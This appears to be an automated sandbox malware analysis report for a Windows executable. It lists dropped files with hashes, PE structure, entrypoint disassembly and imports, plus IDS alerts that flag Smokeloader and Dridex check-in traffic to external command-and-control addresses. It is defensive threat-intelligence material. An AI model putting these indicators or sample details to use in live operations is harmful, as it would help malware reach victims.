                                                                      C:\Users\user\AppData\Roaming\esjbbri:Zone.Identifier

                                                                      Download File
                                                                      Process:C:\Windows\explorer.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:true
                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                      C:\Users\user\AppData\Roaming\etbbahg

                                                                      Download File
                                                                      Process:C:\Windows\explorer.exe
                                                                      File Type:OpenPGP Secret Key
                                                                      Category:dropped
                                                                      Size (bytes):290443
                                                                      Entropy (8bit):7.999440393337273
                                                                      Encrypted:true
                                                                      SSDEEP:6144:Qz0fL6VSYDpmMT0nVg4b3kNJUlNXuN4sK1+U4x5rr7GEiuRdEUw:Qz0DW7B+Vg4QNJUzXueQ9r7tnSUw
                                                                      MD5:44C873B7F02FED2FD5FE488632916CBA
                                                                      SHA1:973C068E2E68C410DAEACF26B34E3546647BAA3E
                                                                      SHA-256:B55DB18169B00DEE9FCAA99414117DFA088BC45EC27FA82EA18F34D1BB5E290F
                                                                      SHA-512:B6C8EE1D692DB73C3CEDDCB8FE92E3DAF82504469C399820ABF2777DC180685657E77EAB555A98CE4A3980FB5A8C528D3BF69F09C9CBA3C6849DAEB6621F0648
                                                                      Malicious:false
                                                                      Preview:.... .q.[...&...p....b...-....../......[....'.T....GY*YC....Qd.....W.0.......|..?..0.....k ?.-..o.K._..M...DY.......F~.R$.:r.~.U..yK!.7,M.K.P...__./.%\.....A..........;...l.......>^].n#gb.?.q.v..*..K>..:n..{.@...O\...4..6$.e.N.. \8W\.....7....@Ya. .Y..T.7yQ.Q.p..m..A{.M..#......>.. .&....%.....C.*b...G..b.....{...k..jH.%v....%>pu^.(SiH....W.v."....0..>Q?./B7..._.*cZ..3..x"..@.....E.G.I..8/H.2.....Hp....S..H.....v..o:.`./}R.....$...Us..4.~.M}..^.p......*:.m.Ce...&.1I..jS.r.....*hK....,rv..udy .C`C... ...!_.8...X...,.`.{d8....e19B..F..P.)..g:...i. U........a%..`.gF?.3.......+....v......Fr.O..6p..`>NZ.}|..........\.#t9.5.G..L...h.....y..._~].lz...!/j.{m..L.>.!jT..f8.&.*.....i%..EL?..'..{.8b...D/.._1DV.......P.5..X.../d.G..|.p...U...a......y..T=...v...aHA._...n.ryh5.V.u......5....@.h.{...q..p0........t.*#6..j..._*N....h.$.^..8...&T..w.5?@...Q^..x.@.UDm....,.2..C0..{..eD/F.B...Y.s.x.p|.....DN.M.....f.?..;..#.a...\>'..........T.,........j[.h....X

                                                                      C:\Users\user\AppData\Roaming\uejbbri

                                                                      Download File
                                                                      Process:C:\Windows\explorer.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):417280
                                                                      Entropy (8bit):6.850109840048764
                                                                      Encrypted:false
                                                                      SSDEEP:6144:qg+Ov/uYh8vkotYJjh+qCeNKkzXlGIXhh1/pYgzquE6Y2T3:yOv9h8vF8+qekzEClYhu1YA
                                                                      MD5:1A29ED2D1AE240EC1D6F50DCC960BAA3
                                                                      SHA1:CAF7120A216A3A39BEE558A6A660F1FFC214A712
                                                                      SHA-256:2E4015F84A9A6D9C22EF65ACC66A3CF55C2CABC2D7A6F32B96297CA7D0F56EA4
                                                                      SHA-512:B5ABBB5ED0431F80E429849C4B45CE1A35A2D123E63520D8863A9817B6A599CC20A2B433B59162E48F546B0D335F16B717A2BEF70F207D3195D5955E70A51BAB
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Joe Sandbox View:
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..A.........`......`.)./..`...s....$..........`......`.-....`.*....Rich...........................PE..L...Kt.e............................S8............@..................................5..........................................d.......P...........................0...............................0...@...............0............................text..."........................... ..`.rdata..x...........................@..@.data............^..................@....rsrc...P............X..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.853098055766101
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:KTh1gQlT9a.exe
                                                                      File size:418'304 bytes
                                                                      MD5:6d9b8ff6442e3c42a7ad0e1238960057
                                                                      SHA1:fab711b446c2cc55f97c7a5afaa9f9833e01a0ea
                                                                      SHA256:a641af0462259586cf10b8867653e163f73b6066106455605643b08ab829ac77
                                                                      SHA512:dc71917d187f65526ad9218d1db79d83752df9017d72ef5afc5607567a4e3b20e3ac77d5c765fcce7f9f18ce8524bed0181db09028a29b832e1928579ee3ce98
                                                                      SSDEEP:6144:lwpk63+zRADFXmigaB0r9v1FkJNdj4E5nkJv23J7quw2T6:+pkQ+zRAhXmiLQ9vmaElkJv2YuwJ
                                                                      TLSH:0A949E439295BF70F5278B729E3EC6FA362EF5624E15276722167E2F24B01B1C123B11
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M..A............f.......f.).)...f...u.....$.............f.......f.-.....f.*.....Rich............................PE..L......e...

                                                                      File Icon

                                                                      Icon Hash:432d49455545610d

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x4037e3
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x65190115 [Sun Oct 1 05:18:13 2023 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:1
                                                                      File Version Major:5
                                                                      File Version Minor:1
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:1
                                                                      Import Hash:a11cbe8ba3528a436618e8dc32e663a6

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      call 00007F7F6D3F25E1h
                                                                      jmp 00007F7F6D3EEA8Eh
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      call 00007F7F6D3EEC3Ch
                                                                      xchg cl, ch
                                                                      jmp 00007F7F6D3EEC24h
                                                                      call 00007F7F6D3EEC33h
                                                                      fxch st(0), st(1)
                                                                      jmp 00007F7F6D3EEC1Bh
                                                                      fabs
                                                                      fld1
                                                                      mov ch, cl
                                                                      xor cl, cl
                                                                      jmp 00007F7F6D3EEC11h
                                                                      mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                                      fabs
                                                                      fxch st(0), st(1)
                                                                      fabs
                                                                      fxch st(0), st(1)
                                                                      fpatan
                                                                      or cl, cl
                                                                      je 00007F7F6D3EEC06h
                                                                      fldpi
                                                                      fsubrp st(1), st(0)
                                                                      or ch, ch
                                                                      je 00007F7F6D3EEC04h
                                                                      fchs
                                                                      ret
                                                                      fabs
                                                                      fld st(0), st(0)
                                                                      fld st(0), st(0)
                                                                      fld1
                                                                      fsubrp st(1), st(0)
                                                                      fxch st(0), st(1)
                                                                      fld1
                                                                      faddp st(1), st(0)
                                                                      fmulp st(1), st(0)
                                                                      ftst
                                                                      wait
                                                                      fstsw word ptr [ebp-000000A0h]
                                                                      wait
                                                                      test byte ptr [ebp-0000009Fh], 00000001h
                                                                      jne 00007F7F6D3EEC07h
                                                                      xor ch, ch
                                                                      fsqrt
                                                                      ret
                                                                      pop eax
                                                                      jmp 00007F7F6D3F11BFh
                                                                      fstp st(0)
                                                                      fld tbyte ptr [0041169Ah]
                                                                      ret
                                                                      fstp st(0)
                                                                      or cl, cl
                                                                      je 00007F7F6D3EEC0Dh
                                                                      fstp st(0)
                                                                      fldpi
                                                                      or ch, ch
                                                                      je 00007F7F6D3EEC04h
                                                                      fchs
                                                                      ret
                                                                      fstp st(0)
                                                                      fldz
                                                                      or ch, ch
                                                                      je 00007F7F6D3EEBF9h
                                                                      fchs
                                                                      ret
                                                                      fstp st(0)
                                                                      jmp 00007F7F6D3F1195h
                                                                      fstp st(0)
                                                                      mov cl, ch
                                                                      jmp 00007F7F6D3EEC02h
                                                                      call 00007F7F6D3EEBCEh
                                                                      jmp 00007F7F6D3F11A0h
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      add esp, FFFFFD30h
                                                                      push ebx

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [C++] VS2010 build 30319
                                                                      • [ASM] VS2010 build 30319
                                                                      • [ C ] VS2010 build 30319
                                                                      • [IMP] VS2008 SP1 build 30729
                                                                      • [RES] VS2010 build 30319
                                                                      • [LNK] VS2010 build 30319

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x401ec0x64.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x205d0000x205f8.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x402500x1c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3fd500x40.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x110000x228.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000xf9020xfa000c7692f809d27d3cbe79f0737eb653d1False0.607578125data6.752865043333725IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x110000x2fe5e0x300009e3cc5cd4ffabcb9b8e7b61c208a536aFalse0.943634033203125data7.882502718965042IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0x410000x201b2100x5e00897d780e40efc176535680455956439aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0x205d0000x205f80x20600c92d339fbbfb0fecdfde5b457ff3e6ceFalse0.4008430863899614data4.74374319544498IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      ZAVUTIDORAMACE0x20764980x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilIndia0.588821322292664
                                                                      ZAVUTIDORAMACE0x20764980x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilSri Lanka0.588821322292664
                                                                      RT_CURSOR0x20783080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.26439232409381663
                                                                      RT_CURSOR0x20791b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.3686823104693141
                                                                      RT_CURSOR0x2079a580x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.49060693641618497
                                                                      RT_CURSOR0x2079ff00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                                                      RT_CURSOR0x207a1200xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                                                      RT_CURSOR0x207a1f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                                                      RT_CURSOR0x207b0a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                                                      RT_CURSOR0x207b9480x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                                                      RT_ICON0x205db000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.4349680170575693
                                                                      RT_ICON0x205db000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.4349680170575693
                                                                      RT_ICON0x205e9a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5374548736462094
                                                                      RT_ICON0x205e9a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5374548736462094
                                                                      RT_ICON0x205f2500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.5996543778801844
                                                                      RT_ICON0x205f2500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.5996543778801844
                                                                      RT_ICON0x205f9180x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6748554913294798
                                                                      RT_ICON0x205f9180x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6748554913294798
                                                                      RT_ICON0x205fe800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilIndia0.3287344398340249
                                                                      RT_ICON0x205fe800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilSri Lanka0.3287344398340249
                                                                      RT_ICON0x20624280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TamilIndia0.40361163227016883
                                                                      RT_ICON0x20624280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TamilSri Lanka0.40361163227016883
                                                                      RT_ICON0x20634d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TamilIndia0.4663934426229508
                                                                      RT_ICON0x20634d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TamilSri Lanka0.4663934426229508
                                                                      RT_ICON0x2063e580x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilIndia0.5549645390070922
                                                                      RT_ICON0x2063e580x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilSri Lanka0.5549645390070922
                                                                      RT_ICON0x20643380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.36433901918976547
                                                                      RT_ICON0x20643380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.36433901918976547
                                                                      RT_ICON0x20651e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.4526173285198556
                                                                      RT_ICON0x20651e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.4526173285198556
                                                                      RT_ICON0x2065a880x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.45910138248847926
                                                                      RT_ICON0x2065a880x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.45910138248847926
                                                                      RT_ICON0x20661500x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.45303468208092484
                                                                      RT_ICON0x20661500x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.45303468208092484
                                                                      RT_ICON0x20666b80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2654564315352697
                                                                      RT_ICON0x20666b80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2654564315352697
                                                                      RT_ICON0x2068c600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.30651969981238275
                                                                      RT_ICON0x2068c600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.30651969981238275
                                                                      RT_ICON0x2069d080x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.35726950354609927
                                                                      RT_ICON0x2069d080x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.35726950354609927
                                                                      RT_ICON0x206a1d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.560501066098081
                                                                      RT_ICON0x206a1d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.560501066098081
                                                                      RT_ICON0x206b0800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5505415162454874
                                                                      RT_ICON0x206b0800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5505415162454874
                                                                      RT_ICON0x206b9280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.6105491329479769
                                                                      RT_ICON0x206b9280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.6105491329479769
                                                                      RT_ICON0x206be900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.4589211618257261
                                                                      RT_ICON0x206be900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.4589211618257261
                                                                      RT_ICON0x206e4380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.48686679174484054
                                                                      RT_ICON0x206e4380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.48686679174484054
                                                                      RT_ICON0x206f4e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.4971311475409836
                                                                      RT_ICON0x206f4e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.4971311475409836
                                                                      RT_ICON0x206fe680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.450354609929078
                                                                      RT_ICON0x206fe680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.450354609929078
                                                                      RT_ICON0x20703380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.488272921108742
                                                                      RT_ICON0x20703380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.488272921108742
                                                                      RT_ICON0x20711e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.4697653429602888
                                                                      RT_ICON0x20711e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.4697653429602888
                                                                      RT_ICON0x2071a880x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.434971098265896
                                                                      RT_ICON0x2071a880x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.434971098265896
                                                                      RT_ICON0x2071ff00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2773858921161826
                                                                      RT_ICON0x2071ff00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2773858921161826
                                                                      RT_ICON0x20745980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.2898686679174484
                                                                      RT_ICON0x20745980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.2898686679174484
                                                                      RT_ICON0x20756400x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.3069672131147541
                                                                      RT_ICON0x20756400x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.3069672131147541
                                                                      RT_ICON0x2075fc80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3395390070921986
                                                                      RT_ICON0x2075fc80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3395390070921986
                                                                      RT_DIALOG0x207c1380x58data0.8977272727272727
                                                                      RT_STRING0x207c1900x38cdataTamilIndia0.473568281938326
                                                                      RT_STRING0x207c1900x38cdataTamilSri Lanka0.473568281938326
                                                                      RT_STRING0x207c5200x56edataTamilIndia0.44316546762589926
                                                                      RT_STRING0x207c5200x56edataTamilSri Lanka0.44316546762589926
                                                                      RT_STRING0x207ca900x2c6dataTamilIndia0.4732394366197183
                                                                      RT_STRING0x207ca900x2c6dataTamilSri Lanka0.4732394366197183
                                                                      RT_STRING0x207cd580x4a2dataTamilIndia0.448566610455312
                                                                      RT_STRING0x207cd580x4a2dataTamilSri Lanka0.448566610455312
                                                                      RT_STRING0x207d2000x3f6dataTamilIndia0.4428007889546351
                                                                      RT_STRING0x207d2000x3f6dataTamilSri Lanka0.4428007889546351
                                                                      RT_ACCELERATOR0x20782d00x38dataTamilIndia0.9107142857142857
                                                                      RT_ACCELERATOR0x20782d00x38dataTamilSri Lanka0.9107142857142857
                                                                      RT_GROUP_CURSOR0x2079fc00x30data0.9375
                                                                      RT_GROUP_CURSOR0x207a1d00x22data1.0588235294117647
                                                                      RT_GROUP_CURSOR0x207beb00x30data0.9375
                                                                      RT_GROUP_ICON0x20702d00x68dataTamilIndia0.7115384615384616
                                                                      RT_GROUP_ICON0x20702d00x68dataTamilSri Lanka0.7115384615384616
                                                                      RT_GROUP_ICON0x20642c00x76dataTamilIndia0.6610169491525424
                                                                      RT_GROUP_ICON0x20642c00x76dataTamilSri Lanka0.6610169491525424
                                                                      RT_GROUP_ICON0x206a1700x68dataTamilIndia0.7115384615384616
                                                                      RT_GROUP_ICON0x206a1700x68dataTamilSri Lanka0.7115384615384616
                                                                      RT_GROUP_ICON0x20764300x68dataTamilIndia0.7211538461538461
                                                                      RT_GROUP_ICON0x20764300x68dataTamilSri Lanka0.7211538461538461
                                                                      RT_VERSION0x207bee00x258data0.5466666666666666

                                                                      Imports

                                                                      DLLImport
                                                                      KERNEL32.dllInterlockedDecrement, GetCurrentProcess, SetEnvironmentVariableW, CreateJobObjectW, SetComputerNameW, CreateHardLinkA, GetModuleHandleW, EnumCalendarInfoExW, GetNumberFormatA, GetWindowsDirectoryA, SetCommState, LoadLibraryW, GetLocaleInfoW, ReadConsoleInputA, GetCalendarInfoW, CreateEventA, SetVolumeMountPointA, GetConsoleAliasExesLengthW, GetVersionExW, GetFileAttributesA, EnumSystemCodePagesA, GetTimeFormatW, GetModuleFileNameW, CreateActCtxA, GetEnvironmentVariableA, SetThreadPriority, GetTempPathW, VerifyVersionInfoW, GlobalUnfix, GetStdHandle, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, GetLongPathNameW, EnumCalendarInfoW, CreateNamedPipeA, LoadModule, GlobalFree, GetProcessVersion, LoadLibraryA, InterlockedExchangeAdd, CreateFileMappingA, LocalAlloc, SetCalendarInfoW, FoldStringA, EnumDateFormatsA, GlobalUnWire, GetProcessShutdownParameters, LoadLibraryExA, GetFileTime, WaitForDebugEvent, OpenEventW, GetShortPathNameW, SetFileShortNameA, GetDiskFreeSpaceExW, LCMapStringW, CommConfigDialogW, ReadFile, GetProcessHeap, SetEndOfFile, GetStringTypeW, MultiByteToWideChar, CreateFileW, WriteConsoleW, InterlockedIncrement, GetConsoleAliasExesA, TlsGetValue, SetFilePointer, GetProcAddress, SetDefaultCommConfigA, FlushFileBuffers, SetStdHandle, HeapFree, EncodePointer, DecodePointer, HeapReAlloc, GetCommandLineW, HeapSetInformation, GetStartupInfoW, IsProcessorFeaturePresent, WideCharToMultiByte, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, HeapCreate, Sleep, HeapSize, ExitProcess, RtlUnwind, HeapAlloc, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RaiseException, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, CreateFileA
                                                                      USER32.dllGetWindowLongW, SetCaretPos, CharUpperA, InsertMenuItemW, DrawStateA, LoadMenuA, CharLowerBuffA, GetSysColor, GetMenuStringA, SetMenu
                                                                      GDI32.dllGetBkMode, CreateDCW, GetCharWidth32W, GetTextCharset, GetCharWidthI
                                                                      WINHTTP.dllWinHttpCloseHandle

                                                                      Possible Origin

                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      TamilIndia
                                                                      TamilSri Lanka

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-09-25T16:01:30.964560+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549711116.58.10.6080TCP
                                                                      2024-09-25T16:01:32.199413+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549712116.58.10.6080TCP
                                                                      2024-09-25T16:01:33.468152+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549713116.58.10.6080TCP
                                                                      2024-09-25T16:01:34.746162+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549714116.58.10.6080TCP
                                                                      2024-09-25T16:01:36.015287+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549715116.58.10.6080TCP
                                                                      2024-09-25T16:01:37.606649+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549716116.58.10.6080TCP
                                                                      2024-09-25T16:01:39.026227+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549717116.58.10.6080TCP
                                                                      2024-09-25T16:01:40.325430+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549718116.58.10.6080TCP
                                                                      2024-09-25T16:01:41.599554+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549719116.58.10.6080TCP
                                                                      2024-09-25T16:01:42.875381+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549720116.58.10.6080TCP
                                                                      2024-09-25T16:01:44.128986+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549721116.58.10.6080TCP
                                                                      2024-09-25T16:01:45.386549+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549722116.58.10.6080TCP
                                                                      2024-09-25T16:01:46.759129+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549723116.58.10.6080TCP
                                                                      2024-09-25T16:01:48.049798+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549724116.58.10.6080TCP
                                                                      2024-09-25T16:01:49.324358+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549725116.58.10.6080TCP
                                                                      2024-09-25T16:01:50.596094+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549726116.58.10.6080TCP
                                                                      2024-09-25T16:01:51.861069+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549727116.58.10.6080TCP
                                                                      2024-09-25T16:01:53.130512+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549728116.58.10.6080TCP
                                                                      2024-09-25T16:01:54.403705+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549729116.58.10.6080TCP
                                                                      2024-09-25T16:01:55.668995+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549730116.58.10.6080TCP
                                                                      2024-09-25T16:01:58.462541+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549732116.58.10.6080TCP
                                                                      2024-09-25T16:01:59.729148+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549733116.58.10.6080TCP
                                                                      2024-09-25T16:02:01.002562+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549735116.58.10.6080TCP
                                                                      2024-09-25T16:02:02.511353+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549736116.58.10.6080TCP
                                                                      2024-09-25T16:02:04.095673+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549737116.58.10.6080TCP
                                                                      2024-09-25T16:02:06.505504+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549738116.58.10.6080TCP
                                                                      2024-09-25T16:02:07.770118+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549739116.58.10.6080TCP
                                                                      2024-09-25T16:02:09.265193+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549740116.58.10.6080TCP
                                                                      2024-09-25T16:02:20.156005+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.54974123.145.40.162443TCP
                                                                      2024-09-25T16:02:20.563474+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.54974123.145.40.162443TCP
